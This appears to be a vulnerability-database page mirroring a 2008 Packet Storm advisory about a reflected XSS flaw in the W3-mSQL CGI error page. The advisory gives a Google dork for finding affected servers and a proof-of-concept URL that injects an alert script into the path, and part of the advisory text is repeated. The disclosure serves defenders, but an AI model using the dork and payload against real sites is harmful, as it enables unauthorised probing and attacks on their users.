Lucene search

w3msql-xss.txt

🗓️ 03 Jan 2008 00:00:00Reported by VivekType

packetstorm🔗 packetstormsecurity.com👁 16 Views

A reflected xss flaw exists in the w3-msql error page. Exploit can be confirmed by inserting a script in the URL

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`A reflected xss flaw exists in the w3-msql error page.  
  
google dork : "W3-mSQL Error! - Can't stat script file (/"  
  
Just insert a script from the start of /  
  
like if u get a URL like:-   
  
http://localhost/cgi-bin/w3-msql/journal/ijcd/index.html  
  
and the error page output as :-  
  
W3-mSQL Error! - Can't stat script file (/journal/ijcd/index.html)  
  
u can try this:-  
  
A reflected xss flaw exists in the w3-msql error page.  
  
google dork : "W3-mSQL Error! - Can't stat script file (/"  
  
Just insert a script from the start of /  
  
like if u get a URL like:-   
  
http://localhost/cgi-bin/w3-msql/<script>alert('xss')</script>  
  
to confirm the issue  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

03 Jan 2008 00:00Current

7.4High risk

Vulners AI Score7.4